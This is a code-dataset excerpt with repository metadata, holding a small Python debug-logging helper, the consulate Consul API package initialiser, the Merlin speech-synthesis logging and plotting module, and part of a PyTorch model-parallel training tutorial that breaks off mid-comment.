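log.log("a debug message")    # printed only while log.logging is True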
| 10.428571
| 21
| 0.60274
|
logging = False
def log(string):
if logging:
print(string)
| true
| true
|
f707b33898280eaac5416d3b674ceab08848bef6
| 579
|
py
|
Python
|
consulate/api/__init__.py
|
python-microservices/consulate
|
9d95a946b3a5c3095437801488cf84836d72192c
|
[
"BSD-3-Clause"
] | null | null | null |
consulate/api/__init__.py
|
python-microservices/consulate
|
9d95a946b3a5c3095437801488cf84836d72192c
|
[
"BSD-3-Clause"
] | null | null | null |
consulate/api/__init__.py
|
python-microservices/consulate
|
9d95a946b3a5c3095437801488cf84836d72192c
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Consul API Endpoints
"""
from consulate.api.acl import ACL
from consulate.api.agent import Agent
from consulate.api.base import Response
from consulate.api.catalog import Catalog
from consulate.api.coordinate import Coordinate
from consulate.api.event import Event
from consulate.api.health import Health
from consulate.api.kv import KV
from consulate.api.lock import Lock
from consulate.api.session import Session
from consulate.api.status import Status
__all__ = ["ACL", "Agent", "Catalog", "Event", "Health", "KV", "Lock", "Session", "Status", "Response", "Coordinate"]
| 32.166667
| 117
| 0.780656
|
from consulate.api.acl import ACL
from consulate.api.agent import Agent
from consulate.api.base import Response
from consulate.api.catalog import Catalog
from consulate.api.coordinate import Coordinate
from consulate.api.event import Event
from consulate.api.health import Health
from consulate.api.kv import KV
from consulate.api.lock import Lock
from consulate.api.session import Session
from consulate.api.status import Status
__all__ = ["ACL", "Agent", "Catalog", "Event", "Health", "KV", "Lock", "Session", "Status", "Response", "Coordinate"]
| true
| true
|
f707b416f6ad86fb6c6a69d25bcc72f5f4890c66
| 14,050
|
py
|
Python
|
src/logplot/logging_plotting.py
|
G-Thor/merlin
|
33fa6e65ddb903ed5633ccb66c74d3e7c128667f
|
[
"Apache-2.0"
] | 1,305
|
2016-08-10T17:32:36.000Z
|
2022-03-29T08:23:34.000Z
|
src/logplot/logging_plotting.py
|
G-Thor/merlin
|
33fa6e65ddb903ed5633ccb66c74d3e7c128667f
|
[
"Apache-2.0"
] | 464
|
2016-08-15T16:09:12.000Z
|
2022-01-04T01:26:57.000Z
|
src/logplot/logging_plotting.py
|
G-Thor/merlin
|
33fa6e65ddb903ed5633ccb66c74d3e7c128667f
|
[
"Apache-2.0"
] | 508
|
2016-08-10T16:58:23.000Z
|
2022-03-23T06:52:06.000Z
|
################################################################################
# The Neural Network (NN) based Speech Synthesis System
# https://svn.ecdf.ed.ac.uk/repo/inf/dnn_tts/
#
# Centre for Speech Technology Research
# University of Edinburgh, UK
# Copyright (c) 2014-2015
# All Rights Reserved.
#
# The system as a whole and most of the files in it are distributed
# under the following copyright and conditions
#
# Permission is hereby granted, free of charge, to use and distribute
# this software and its documentation without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of this work, and to
# permit persons to whom this work is furnished to do so, subject to
# the following conditions:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# - The authors' names may not be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THE UNIVERSITY OF EDINBURGH AND THE CONTRIBUTORS TO THIS WORK
# DISCLAIM ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN NO EVENT
# SHALL THE UNIVERSITY OF EDINBURGH NOR THE CONTRIBUTORS BE LIABLE
# FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN
# AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION,
# ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF
# THIS SOFTWARE.
################################################################################
# NOTES
# still to consider: pygal, for HTML5 SVG plotting
import math
import string
import os
# this module provides the base classes that we specialise here
import logging # as logging
# for plotting
import matplotlib
# should make this user-configurable - TO DO later
# this line has to come before the import of matplotlib.pyplot
matplotlib.use('PDF')
import matplotlib.pyplot as plt
import pylab
from matplotlib.ticker import MultipleLocator, FormatStrFormatter
# matplotlib needs to be passed numpy arrays
import numpy
# for sorting tuples
from operator import itemgetter, attrgetter
# TO DO - this needs to be attached to the logging module so that it's available via config options
# class PlotHandler(logging.FileHandler):
# """A handler for saving plots to disk"""
# def __init__(self,filename):
# logging.FileHandler.__init__(self,filename, mode='a', encoding=None, delay=False)
class PlotWithData(object):
# a generic plot object that contains both the underlying data and the plot itself
# this class needs to be subclassed for each specialised type of plot that we want
# the underlying data for the plot - a dictionary of data series
# each series is a list of data points of arbitrary type (e.g., tuples, arrays, ..)
data=None
# the plot generated from these data
plot=None
def __init__(self,name):
# clear the data series
self.data={}
def add_data_point(self,series_name,data_point):
# if there is no data series with this name yet, create an empty one
if series_name not in self.data:
self.data[series_name]=[]
# append this data point (e.g., it might be a tuple (x,y) )
# don't worry about data type or sorting - that is not our concern here
self.data[series_name].append(data_point)
def sort_and_validate(self):
# only applied if the data points are tuples, such as (x,y) values
# TO DO: first check that each series is a list of tuples, and that they have the same number of elements
# this method checks that all data series
# 1. have the same length
# 2. are sorted in ascending order of x
# 3. have identical values in their x series
# there has to be at least one data series
        logger = logging.getLogger("plotting")
        try:
            assert len(self.data) > 0
        except AssertionError:
            logger.critical('No data series found in plot')
            raise
# check lengths are consistent, sort, then check x values are identical
l=-1
reference_x=None
# print "starting with self.data=",self.data
for series_name,data_points in self.data.items():
if l > 0:
assert l == len(data_points)
else:
l = len(data_points)
# sort by ascending x value
data_points.sort(key=itemgetter(0))
if reference_x:
assert reference_x == [seq[0] for seq in data_points]
else:
# extract a list of just the x values
reference_x = [seq[0] for seq in data_points]
# print "ending with self.data=",self.data
def generate_plot(self,**kwargs):
logger = logging.getLogger("plotting")
logger.error('Cannot generate a plot from abstract class: PlotWithData' )
# raise an exception here?
class MultipleSeriesPlot(PlotWithData):
def generate_plot(self,filename,title='',xlabel='',ylabel='',xlim=None,ylim=None):
logger = logging.getLogger("plotting")
logger.debug('MultipleSeriesPlot.generate_plot')
# a plot with one or more time series sharing a common x axis:
# e.g., the training error and the validation error plotted against epochs
# sort the data series and make sure they are consistent
self.sort_and_validate()
# if there is a plot already in existence, we will clear it and re-use it;
# this avoids creating extraneous figures which will stay in memory
# (even if we are no longer referencing them)
if self.plot:
self.plot.clf()
else:
# create a plot
self.plot = plt.figure()
splt = self.plot.add_subplot(1, 1, 1)
splt.set_title(title)
splt.set_xlabel(xlabel)
splt.set_ylabel(ylabel)
if xlim:
pylab.xlim(xlim)
if ylim:
pylab.ylim(ylim)
for series_name,data_points in self.data.items():
xpoints=numpy.asarray([seq[0] for seq in data_points])
ypoints=numpy.asarray([seq[1] for seq in data_points])
line, = splt.plot(xpoints, ypoints, '-', linewidth=2)
logger.debug('set_label for %s' % series_name)
line.set_label(series_name)
splt.legend()
# TO DO - better filename configuration for plots
self.plot.savefig(filename)
class SingleWeightMatrixPlot(PlotWithData):
    def generate_plot(self, filename, title='', xlabel='', ylabel=''):
        logger = logging.getLogger("plotting")
data_keys = list(self.data.keys())
key_num = len(data_keys)
self.plot = plt.figure()
if key_num == 1:
splt = self.plot.add_subplot(1, 1, 1)
im_data = splt.imshow(numpy.flipud(self.data[data_keys[0]][0]), origin='lower')
splt.set_xlabel(xlabel)
splt.set_ylabel(ylabel)
splt.set_title(title)
        else:  ## plotting multiple images in one figure is still problematic; the visualization is not good
            logger.error('not supported yet')
            return
        self.plot.colorbar(im_data)
self.plot.savefig(filename) #, bbox_inches='tight'
#class MultipleLinesPlot(PlotWithData):
# def generate_plot(self, filename, title='', xlabel='', ylabel=''):
class LoggerPlotter(logging.getLoggerClass()):
"""Based on the built-in logging class, with added capabilities including plotting"""
# a dictionary to store all generated plots
# keys are plot names
# values are
plots ={}
# where the plots will be saved - a directory
plot_path='/tmp' # default location
def __init__(self,name):
# initialise the logging parent class
# (should really use 'super' here I think, but that fails - perhaps because the built in logger class is not derived from 'object' ?)
logging.Logger.__init__(self,name)
def set_plot_path(self,path):
self.plot_path = path
def remove_all_plots(self):
self.plots={}
def create_plot(self,plot_name,plot_object):
self.plots[plot_name] = plot_object(plot_name)
def add_plot_point(self,plot_name,series_name,data_point):
# add a data point to a named plot
if plot_name not in self.plots:
self.plots[plot_name] = PlotWithData(plot_name)
self.plots[plot_name].add_data_point(series_name,data_point)
def save_plot(self,plot_name,**kwargs):
logger = logging.getLogger("plotting")
if plot_name not in self.plots:
            logger.warning('Tried to generate a plot called %s that does not exist' % plot_name)
# raise an exception here?
else:
# # the filename to save to is known by the handler, which needs to be assigned to this logger
# # look at the handlers attached to this logger instance
# ph=None
# for h in self.handlers:
# # we want an instance of a PlotHandler - we'll take the first one we find
# # (behaviour will be unpredictable if there is more than one handler of this type)
# if isinstance(h,PlotHandler):
# ph=h
# break
# if ph:
# TO DO - need to be sure of safe file names
if not os.path.isdir(self.plot_path):
os.makedirs(self.plot_path)
            filename = self.plot_path + "/" + plot_name.replace(" ", "_") + ".pdf"
logger.info('Generating a plot in file %s' % filename)
self.plots[plot_name].generate_plot(filename,**kwargs)
# else:
# logger.warn('No handler of type PlotHandler is attached to this logger - cannot save plots')
class ColouredFormatter(logging.Formatter):
# colourising formatter adapted from an answer to this question on Stack Overflow
# http://stackoverflow.com/questions/384076/how-can-i-color-python-logging-output
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = list(range(8))
COLOURS = {
'DEBUG': BLUE,
'INFO': GREEN,
'WARNING': YELLOW,
'ERROR': RED,
'CRITICAL': MAGENTA
}
max_level_name_width = '8'
# terminal escape sequences
RESET_SEQ = "\033[0m"
COLOUR_SEQ = "\033[1;%dm"
BOLD_SEQ = "\033[1m"
def format(self, record):
if record.levelname in self.COLOURS:
# pad to fixed width - currently hardwired, should make this dynamic
# maximum width of level names, which is the 8 characters of "CRITICAL"
fixed_width_levelname = '{0:8s}'.format(record.levelname)
record.name = '{0:8s}'.format(record.name)
# The background is set with 40 plus the number of the color, and the foreground with 30
record.levelname = self.COLOUR_SEQ % (30 + self.COLOURS[record.levelname]) + fixed_width_levelname + self.RESET_SEQ
return logging.Formatter.format(self, record)
def factory(fmt, datefmt):
    # ColouredFormatter is itself a logging.Formatter subclass, so build it
    # directly; wrapping another Formatter instance (as before) would pass a
    # non-string fmt argument and break formatting.
    return ColouredFormatter(fmt, datefmt)
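# A sketch of wiring `factory` into logging.config.dictConfig: the special
# '()' key names a formatter factory, and the remaining keys are passed to
# it as keyword arguments (the dotted import path below is hypothetical):
#
#   import logging.config
#   logging.config.dictConfig({
#       "version": 1,
#       "formatters": {
#           "coloured": {
#               "()": "logging_plotting.factory",
#               "fmt": "%(asctime)s - %(name)s - %(levelname)s - %(message)s",
#               "datefmt": None,
#           },
#       },
#       "handlers": {
#           "console": {"class": "logging.StreamHandler", "formatter": "coloured"},
#       },
#       "root": {"level": "DEBUG", "handlers": ["console"]},
#   })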
if __name__ == '__main__':
# some simple tests
# tell the built-in logger module to use our custom class when instantiating any new logger
logging.setLoggerClass(LoggerPlotter)
logger = logging.getLogger("test_logger")
logger.setLevel(logging.DEBUG)
# a console handler
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = ColouredFormatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
print("testing the logging code")
logger.debug('A DEBUG message')
logger.info('A INFO message')
logger.warning('A WARN message')
logger.error('A ERROR message')
logger.critical('A CRITICAL message')
plotlogger = logging.getLogger("plotting")
plotlogger.setLevel(logging.DEBUG)
# handler for plotting logger - will write only to console
plotlogger.addHandler(ch)
# # need a handler which will control where to save plots
# ph = PlotHandler("/tmp/plot_test/testing.pdf")
# logger.addHandler(ph)
print("testing the plotting code")
# the first argument is just a key for referring to this plot within the code
# the second argument says what kind of plot we will be making
plotlogger.set_plot_path("./tmp")
    logger.create_plot('test plot', MultipleSeriesPlot)
plotlogger.add_plot_point('test plot','validation',(1,4))
plotlogger.add_plot_point('test plot','validation',(3,2))
plotlogger.add_plot_point('test plot','validation',(2,3))
plotlogger.add_plot_point('test plot','validation',(4,3))
plotlogger.add_plot_point('test plot','training',(1,3))
plotlogger.add_plot_point('test plot','training',(3,1))
plotlogger.add_plot_point('test plot','training',(2,2))
plotlogger.add_plot_point('test plot','training',(4,4))
plotlogger.save_plot('test plot',title='Training and validation error',xlabel='epochs',ylabel='error')
weights = [[1, 2, 3, 3], [1, 1, 2, 1], [2, 1, 2, 2]]
logger.create_plot('activation weight', SingleWeightMatrixPlot)
plotlogger.add_plot_point('activation weight', 'weight1', weights)
plotlogger.add_plot_point('activation weight', 'weight2', weights)
plotlogger.add_plot_point('activation weight', 'weight3', weights)
plotlogger.save_plot('activation weight', title='weight', xlabel='dimension', ylabel='dimension')
| 37.87062
| 141
| 0.653737
|
# from this software without specific prior written permission.
#
# THE UNIVERSITY OF EDINBURGH AND THE CONTRIBUTORS TO THIS WORK
# DISCLAIM ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN NO EVENT
# SHALL THE UNIVERSITY OF EDINBURGH NOR THE CONTRIBUTORS BE LIABLE
# FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN
# AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION,
# ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF
# THIS SOFTWARE.
################################################################################
# NOTES
# still to consider: pygal, for HTML5 SVG plotting
import math
import string
import os
# this module provides the base classes that we specialise here
import logging # as logging
# for plotting
import matplotlib
# should make this user-configurable - TO DO later
# this line has to come before the import of matplotlib.pyplot
matplotlib.use('PDF')
import matplotlib.pyplot as plt
import pylab
from matplotlib.ticker import MultipleLocator, FormatStrFormatter
# matplotlib needs to be passed numpy arrays
import numpy
# for sorting tuples
from operator import itemgetter, attrgetter
# TO DO - this needs to be attached to the logging module so that it's available via config options
class PlotWithData(object):
data=None
plot=None
def __init__(self,name):
self.data={}
def add_data_point(self,series_name,data_point):
if series_name not in self.data:
self.data[series_name]=[]
self.data[series_name].append(data_point)
def sort_and_validate(self):
# only applied if the data points are tuples, such as (x,y) values
# TO DO: first check that each series is a list of tuples, and that they have the same number of elements
# this method checks that all data series
# 1. have the same length
# 2. are sorted in ascending order of x
# 3. have identical values in their x series
# there has to be at least one data series
        logger = logging.getLogger("plotting")
        try:
            assert len(self.data) > 0
        except AssertionError:
            logger.critical('No data series found in plot')
            raise
# check lengths are consistent, sort, then check x values are identical
l=-1
reference_x=None
# print "starting with self.data=",self.data
for series_name,data_points in self.data.items():
if l > 0:
assert l == len(data_points)
else:
l = len(data_points)
# sort by ascending x value
data_points.sort(key=itemgetter(0))
if reference_x:
assert reference_x == [seq[0] for seq in data_points]
else:
# extract a list of just the x values
reference_x = [seq[0] for seq in data_points]
# print "ending with self.data=",self.data
def generate_plot(self,**kwargs):
logger = logging.getLogger("plotting")
logger.error('Cannot generate a plot from abstract class: PlotWithData' )
# raise an exception here?
class MultipleSeriesPlot(PlotWithData):
def generate_plot(self,filename,title='',xlabel='',ylabel='',xlim=None,ylim=None):
logger = logging.getLogger("plotting")
logger.debug('MultipleSeriesPlot.generate_plot')
# a plot with one or more time series sharing a common x axis:
# e.g., the training error and the validation error plotted against epochs
# sort the data series and make sure they are consistent
self.sort_and_validate()
# if there is a plot already in existence, we will clear it and re-use it;
# this avoids creating extraneous figures which will stay in memory
# (even if we are no longer referencing them)
if self.plot:
self.plot.clf()
else:
# create a plot
self.plot = plt.figure()
splt = self.plot.add_subplot(1, 1, 1)
splt.set_title(title)
splt.set_xlabel(xlabel)
splt.set_ylabel(ylabel)
if xlim:
pylab.xlim(xlim)
if ylim:
pylab.ylim(ylim)
for series_name,data_points in self.data.items():
xpoints=numpy.asarray([seq[0] for seq in data_points])
ypoints=numpy.asarray([seq[1] for seq in data_points])
line, = splt.plot(xpoints, ypoints, '-', linewidth=2)
logger.debug('set_label for %s' % series_name)
line.set_label(series_name)
splt.legend()
# TO DO - better filename configuration for plots
self.plot.savefig(filename)
class SingleWeightMatrixPlot(PlotWithData):
    def generate_plot(self, filename, title='', xlabel='', ylabel=''):
        logger = logging.getLogger("plotting")
data_keys = list(self.data.keys())
key_num = len(data_keys)
self.plot = plt.figure()
if key_num == 1:
splt = self.plot.add_subplot(1, 1, 1)
im_data = splt.imshow(numpy.flipud(self.data[data_keys[0]][0]), origin='lower')
splt.set_xlabel(xlabel)
splt.set_ylabel(ylabel)
splt.set_title(title)
        else:  ## plotting multiple images in one figure is still problematic; the visualization is not good
            logger.error('not supported yet')
            return
        self.plot.colorbar(im_data)
self.plot.savefig(filename) #, bbox_inches='tight'
#class MultipleLinesPlot(PlotWithData):
# def generate_plot(self, filename, title='', xlabel='', ylabel=''):
class LoggerPlotter(logging.getLoggerClass()):
# a dictionary to store all generated plots
# keys are plot names
# values are
plots ={}
# where the plots will be saved - a directory
plot_path='/tmp' # default location
def __init__(self,name):
# initialise the logging parent class
# (should really use 'super' here I think, but that fails - perhaps because the built in logger class is not derived from 'object' ?)
logging.Logger.__init__(self,name)
def set_plot_path(self,path):
self.plot_path = path
def remove_all_plots(self):
self.plots={}
def create_plot(self,plot_name,plot_object):
self.plots[plot_name] = plot_object(plot_name)
def add_plot_point(self,plot_name,series_name,data_point):
# add a data point to a named plot
if plot_name not in self.plots:
self.plots[plot_name] = PlotWithData(plot_name)
self.plots[plot_name].add_data_point(series_name,data_point)
def save_plot(self,plot_name,**kwargs):
logger = logging.getLogger("plotting")
if plot_name not in self.plots:
            logger.warning('Tried to generate a plot called %s that does not exist' % plot_name)
# raise an exception here?
else:
# # the filename to save to is known by the handler, which needs to be assigned to this logger
# # look at the handlers attached to this logger instance
# ph=None
# for h in self.handlers:
# # we want an instance of a PlotHandler - we'll take the first one we find
if not os.path.isdir(self.plot_path):
os.makedirs(self.plot_path)
            filename = self.plot_path + "/" + plot_name.replace(" ", "_") + ".pdf"
logger.info('Generating a plot in file %s' % filename)
self.plots[plot_name].generate_plot(filename,**kwargs)
class ColouredFormatter(logging.Formatter):
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = list(range(8))
COLOURS = {
'DEBUG': BLUE,
'INFO': GREEN,
'WARNING': YELLOW,
'ERROR': RED,
'CRITICAL': MAGENTA
}
max_level_name_width = '8'
RESET_SEQ = "\033[0m"
COLOUR_SEQ = "\033[1;%dm"
BOLD_SEQ = "\033[1m"
def format(self, record):
if record.levelname in self.COLOURS:
fixed_width_levelname = '{0:8s}'.format(record.levelname)
record.name = '{0:8s}'.format(record.name)
record.levelname = self.COLOUR_SEQ % (30 + self.COLOURS[record.levelname]) + fixed_width_levelname + self.RESET_SEQ
return logging.Formatter.format(self, record)
def factory(fmt, datefmt):
    return ColouredFormatter(fmt, datefmt)
if __name__ == '__main__':
logging.setLoggerClass(LoggerPlotter)
logger = logging.getLogger("test_logger")
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = ColouredFormatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
print("testing the logging code")
logger.debug('A DEBUG message')
logger.info('A INFO message')
logger.warning('A WARN message')
logger.error('A ERROR message')
logger.critical('A CRITICAL message')
plotlogger = logging.getLogger("plotting")
plotlogger.setLevel(logging.DEBUG)
plotlogger.addHandler(ch)
print("testing the plotting code")
plotlogger.set_plot_path("./tmp")
    logger.create_plot('test plot', MultipleSeriesPlot)
plotlogger.add_plot_point('test plot','validation',(1,4))
plotlogger.add_plot_point('test plot','validation',(3,2))
plotlogger.add_plot_point('test plot','validation',(2,3))
plotlogger.add_plot_point('test plot','validation',(4,3))
plotlogger.add_plot_point('test plot','training',(1,3))
plotlogger.add_plot_point('test plot','training',(3,1))
plotlogger.add_plot_point('test plot','training',(2,2))
plotlogger.add_plot_point('test plot','training',(4,4))
plotlogger.save_plot('test plot',title='Training and validation error',xlabel='epochs',ylabel='error')
weights = [[1, 2, 3, 3], [1, 1, 2, 1], [2, 1, 2, 2]]
logger.create_plot('activation weight', SingleWeightMatrixPlot)
plotlogger.add_plot_point('activation weight', 'weight1', weights)
plotlogger.add_plot_point('activation weight', 'weight2', weights)
plotlogger.add_plot_point('activation weight', 'weight3', weights)
plotlogger.save_plot('activation weight', title='weight', xlabel='dimension', ylabel='dimension')
| true
| true
|
f707b500c5ee72beaed596d031c6f55b8804b116
| 13,617
|
py
|
Python
|
intermediate_source/model_parallel_tutorial.py
|
Mirwaisse/tutorials
|
c1523d3f16d6a4bd370261129c75a4383c5491d9
|
[
"BSD-3-Clause"
] | 1
|
2022-02-23T03:13:50.000Z
|
2022-02-23T03:13:50.000Z
|
intermediate_source/model_parallel_tutorial.py
|
MaureenZOU/tutorials
|
18ec63ce8c85ef11af92685cc1436fd3034efc74
|
[
"BSD-3-Clause"
] | 2
|
2022-01-13T04:11:34.000Z
|
2022-03-12T01:04:00.000Z
|
intermediate_source/model_parallel_tutorial.py
|
MaureenZOU/tutorials
|
18ec63ce8c85ef11af92685cc1436fd3034efc74
|
[
"BSD-3-Clause"
] | 2
|
2020-02-22T21:33:40.000Z
|
2021-08-19T02:06:56.000Z
|
# -*- coding: utf-8 -*-
"""
Model Parallel Best Practices
*************************************************************
**Author**: `Shen Li <https://mrshenli.github.io/>`_
Data parallel and model parallel are widely-used in distributed training
techniques. Previous posts have explained how to use
`DataParallel <https://pytorch.org/tutorials/beginner/blitz/data_parallel_tutorial.html>`_
to train a neural network on multiple GPUs. ``DataParallel`` replicates the
same model to all GPUs, where each GPU consumes a different partition of the
input data. Although it can significantly accelerate the training process, it
does not work for some use cases where the model is too large to fit into a
single GPU. This post shows how to solve that problem by using model parallel
and also shares some insights on how to speed up model parallel training.
The high-level idea of model parallel is to place different sub-networks of a
model onto different devices, and implement the ``forward`` method accordingly
to move intermediate outputs across devices. As only part of a model operates
on any individual device, a set of devices can collectively serve a larger
model. In this post, we will not try to construct huge models and squeeze them
into a limited number of GPUs. Instead, this post focuses on showing the idea
of model parallel. It is up to the readers to apply the ideas to real-world
applications.
**Recommended Reading:**
- https://pytorch.org/ For installation instructions
- :doc:`/beginner/blitz/data_parallel_tutorial` Single-Machine Data Parallel
- :doc:`/intermediate/ddp_tutorial` Combine Distributed Data Parallel and Model Parallel
"""
######################################################################
# Basic Usage
# =======================
#
# Let us start with a toy model that contains two linear layers. To run this
# model on two GPUs, simply put each linear layer on a different GPU, and move
# inputs and intermediate outputs to match the layer devices accordingly.
import torch
import torch.nn as nn
import torch.optim as optim
class ToyModel(nn.Module):
def __init__(self):
super(ToyModel, self).__init__()
self.net1 = torch.nn.Linear(10, 10).to('cuda:0')
self.relu = torch.nn.ReLU()
self.net2 = torch.nn.Linear(10, 5).to('cuda:1')
def forward(self, x):
x = self.relu(self.net1(x.to('cuda:0')))
return self.net2(x.to('cuda:1'))
######################################################################
# Note that the above ``ToyModel`` looks very similar to how one would
# implement it on a single GPU, except for the five ``to(device)`` calls which
# place linear layers and tensors on proper devices. That is the only place in
# the model that requires changes. The ``backward()`` and ``torch.optim`` will
# automatically take care of gradients as if the model is on one GPU. You only
# need to make sure that the labels are on the same device as the outputs when
# calling the loss function.
model = ToyModel()
loss_fn = nn.MSELoss()
optimizer = optim.SGD(model.parameters(), lr=0.001)
optimizer.zero_grad()
outputs = model(torch.randn(20, 10))
labels = torch.randn(20, 5).to('cuda:1')
loss_fn(outputs, labels).backward()
optimizer.step()
######################################################################
# Apply Model Parallel to Existing Modules
# =======================
#
# It is also possible to run an existing single-GPU module on multiple GPUs
# with just a few lines of changes. The code below shows how to decompose
# ``torchvision.models.resnet50()`` across two GPUs. The idea is to inherit from
# the existing ``ResNet`` module, and split the layers to two GPUs during
# construction. Then, override the ``forward`` method to stitch two
# sub-networks by moving the intermediate outputs accordingly.
from torchvision.models.resnet import ResNet, Bottleneck
num_classes = 1000
class ModelParallelResNet50(ResNet):
def __init__(self, *args, **kwargs):
super(ModelParallelResNet50, self).__init__(
Bottleneck, [3, 4, 6, 3], num_classes=num_classes, *args, **kwargs)
self.seq1 = nn.Sequential(
self.conv1,
self.bn1,
self.relu,
self.maxpool,
self.layer1,
self.layer2
).to('cuda:0')
self.seq2 = nn.Sequential(
self.layer3,
self.layer4,
self.avgpool,
).to('cuda:1')
self.fc.to('cuda:1')
def forward(self, x):
x = self.seq2(self.seq1(x).to('cuda:1'))
return self.fc(x.view(x.size(0), -1))
######################################################################
# The above implementation solves the problem for cases where the model is too
# large to fit into a single GPU. However, you might have already noticed that
# it will be slower than running it on a single GPU if your model fits. This is
# because, at any point in time, only one of the two GPUs is working, while
# the other one is sitting there doing nothing. The performance further
# deteriorates as the intermediate outputs need to be copied from ``cuda:0`` to
# ``cuda:1`` between ``layer2`` and ``layer3``.
#
# Let us run an experiment to get a more quantitative view of the execution
# time. In this experiment, we train ``ModelParallelResNet50`` and the existing
# ``torchvision.models.resnet50()`` by running random inputs and labels through
# them. After the training, the models will not produce any useful predictions,
# but we can get a reasonable understanding of the execution times.
import torchvision.models as models
num_batches = 3
batch_size = 120
image_w = 128
image_h = 128
def train(model):
model.train(True)
loss_fn = nn.MSELoss()
optimizer = optim.SGD(model.parameters(), lr=0.001)
one_hot_indices = torch.LongTensor(batch_size) \
.random_(0, num_classes) \
.view(batch_size, 1)
for _ in range(num_batches):
# generate random inputs and labels
inputs = torch.randn(batch_size, 3, image_w, image_h)
labels = torch.zeros(batch_size, num_classes) \
.scatter_(1, one_hot_indices, 1)
# run forward pass
optimizer.zero_grad()
outputs = model(inputs.to('cuda:0'))
# run backward pass
labels = labels.to(outputs.device)
loss_fn(outputs, labels).backward()
optimizer.step()
######################################################################
# The ``train(model)`` method above uses ``nn.MSELoss`` as the loss function,
# and ``optim.SGD`` as the optimizer. It mimics training on ``128 X 128``
# images which are organized into 3 batches where each batch contains 120
# images. Then, we use ``timeit`` to run the ``train(model)`` method 10 times
# and plot the execution times with standard deviations.
import matplotlib.pyplot as plt
plt.switch_backend('Agg')
import numpy as np
import timeit
num_repeat = 10
stmt = "train(model)"
setup = "model = ModelParallelResNet50()"
# globals arg is only available in Python 3. In Python 2, use the following
# import __builtin__
# __builtin__.__dict__.update(locals())
mp_run_times = timeit.repeat(
stmt, setup, number=1, repeat=num_repeat, globals=globals())
mp_mean, mp_std = np.mean(mp_run_times), np.std(mp_run_times)
setup = "import torchvision.models as models;" + \
"model = models.resnet50(num_classes=num_classes).to('cuda:0')"
rn_run_times = timeit.repeat(
stmt, setup, number=1, repeat=num_repeat, globals=globals())
rn_mean, rn_std = np.mean(rn_run_times), np.std(rn_run_times)
def plot(means, stds, labels, fig_name):
fig, ax = plt.subplots()
ax.bar(np.arange(len(means)), means, yerr=stds,
align='center', alpha=0.5, ecolor='red', capsize=10, width=0.6)
ax.set_ylabel('ResNet50 Execution Time (Second)')
ax.set_xticks(np.arange(len(means)))
ax.set_xticklabels(labels)
ax.yaxis.grid(True)
plt.tight_layout()
plt.savefig(fig_name)
plt.close(fig)
plot([mp_mean, rn_mean],
[mp_std, rn_std],
['Model Parallel', 'Single GPU'],
'mp_vs_rn.png')
######################################################################
#
# .. figure:: /_static/img/model-parallel-images/mp_vs_rn.png
# :alt:
#
# The result shows that the execution time of the model parallel implementation is
# ``4.02/3.75-1=7%`` longer than the existing single-GPU implementation. So we
# can conclude there is roughly 7% overhead in copying tensors back and forth
# across the GPUs. There is room for improvement, as we know one of the two
# GPUs is sitting idle throughout the execution. One option is to further
# divide each batch into a pipeline of splits, such that when one split reaches
# the second sub-network, the following split can be fed into the first
# sub-network. In this way, two consecutive splits can run concurrently on two
# GPUs.
######################################################################
# Speed Up by Pipelining Inputs
# =======================
#
# In the following experiments, we further divide each 120-image batch into
# 20-image splits. As PyTorch launches CUDA operations asynchronously, the
# implementation does not need to spawn multiple threads to achieve
# concurrency.
class PipelineParallelResNet50(ModelParallelResNet50):
def __init__(self, split_size=20, *args, **kwargs):
super(PipelineParallelResNet50, self).__init__(*args, **kwargs)
self.split_size = split_size
def forward(self, x):
splits = iter(x.split(self.split_size, dim=0))
s_next = next(splits)
s_prev = self.seq1(s_next).to('cuda:1')
ret = []
for s_next in splits:
# A. s_prev runs on cuda:1
s_prev = self.seq2(s_prev)
ret.append(self.fc(s_prev.view(s_prev.size(0), -1)))
# B. s_next runs on cuda:0, which can run concurrently with A
s_prev = self.seq1(s_next).to('cuda:1')
s_prev = self.seq2(s_prev)
ret.append(self.fc(s_prev.view(s_prev.size(0), -1)))
return torch.cat(ret)
setup = "model = PipelineParallelResNet50()"
pp_run_times = timeit.repeat(
stmt, setup, number=1, repeat=num_repeat, globals=globals())
pp_mean, pp_std = np.mean(pp_run_times), np.std(pp_run_times)
plot([mp_mean, rn_mean, pp_mean],
[mp_std, rn_std, pp_std],
['Model Parallel', 'Single GPU', 'Pipelining Model Parallel'],
'mp_vs_rn_vs_pp.png')
######################################################################
# Please note that device-to-device tensor copy operations are synchronized on
# the current streams of the source and the destination devices. If you create
# multiple streams, you have to make sure that copy operations are properly
# synchronized. Writing the source tensor, or reading/writing the destination
# tensor, before the copy operation finishes can lead to undefined behavior.
# The above implementation only uses default streams on both source and
# destination devices, hence it is not necessary to enforce additional
